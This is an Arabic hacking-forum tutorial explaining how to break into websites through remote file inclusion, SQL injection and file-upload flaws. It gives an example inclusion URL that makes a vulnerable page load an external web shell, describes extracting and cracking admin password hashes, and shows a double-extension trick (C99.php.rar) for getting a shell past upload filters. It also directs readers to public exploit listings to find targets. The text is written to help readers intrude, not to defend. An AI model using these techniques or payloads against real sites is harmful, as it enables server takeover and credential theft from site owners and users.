طبعا إخواني نعلم أن كل شيء صنعه الإنسان فيه أخطاء فهو بشر و ليس إله لذلك فالثغرات عبارة عن اخطاء يقع فيها مصمم البرنامج او سكربت معين ... ومن خلال هذه الاخطاء يجد الهكر منافذ لدخول الى المواقع .. والوصول الى السيرفر Powered by vBulletin Version = يدل على سكربت المنتدى ... وهكذا 1 - ثغرات الفايل انكلود (( Remote File Inclusion Vulnerability )) يقصد بهذا النوع من الثغرات ... ان المصمم وقع فى خط برمجى وهذا الخطء يسمح لى رابط ملف خارجى بالموقع وطبعا الملف الخارجي يكون ( الشل = اداه اختراق ) وهذا تكملة لما قلته لكم طبعا منذ قليل بأن كل شيء صنعه الإنسان فيه أخطاء - ثغرة الفايل انكلود ... طبعا نحن قلنا ان هذا النوع من الثغرات تسمح لى رابط ملف خارجى بالموقع بو اسطة متغير معين وطبعا الملف الخارجي يكون ( الشل = اداه اختراق ) على سبيل المثال ... عندى موقع www.google.com/vb/ مصاب بثغرة فايل فى سكربت المنتدى الى هو VB والخط على صفحة faq.php والمتغير الى يسمح لى بربط الشل هو almuhajer فان الثغرة والاستغلال يكون بهذا الشكل ... /ww.google.com/vb/faq.php?almuhajer=إسم الشل.txt?cmd تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل ) http://www.google.com/Folder/pag.php...=youshell.txt? الموقع = www.xxx.com مجلد السكربت = Folder الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php المتغير الى نربط به الملف الخارجى ( الشل ) incloud علامة = الشل بصغية تكتس = youshell.txt وعلامة ؟ وكذا نحن الان عرفنا كيفية التعامل مع الثغرات الفايل انكلود لكن كيف يا مهاجر سنعرف هذه الملفات التي تحوي أخطاء و بالتالي نستغلّها ؟؟ هناك مواقع ستساعدنا مثل من هذه المواقع http://milw0rm.org وكذلك http://securityfocus.com طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.org/***apps.php ونبحث عن الثغرات الفايل الانكلود هذا مثال على الثغرة http://milw0rm.org/exploits/4607 و هناك عدة أنواع من الشل تختلف في عدة أشياء مثل تخطي السايف مود و التنقل و الإمكانية التي تتيحها لك على السيرفر وفق صلاحياتك النوع الثاني من الثغرات ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ... ناخذ مثال على هذا النوع http://milw0rm.org/exploits/4620 النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل ة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar تحيّاتي لكم almuhajer منتديات جيوش الهكرز
التعديل الأخير تم بواسطة millen!um ; 07-08-2010 الساعة 06:56 AM
فريق جيوش الهكرز|| shell-c0d3r || سابقا موقع أهل السنّة و الجماعة في تونس >> http://www.tunisia-sunna.com وداعا للحقن - طريقة تغيير روابط php إلى html بملف .htaccess الحماية من رفع الشل عن طريق الحقن SQL injection و إخفاء مسار اليوزر
قوانين المنتدى
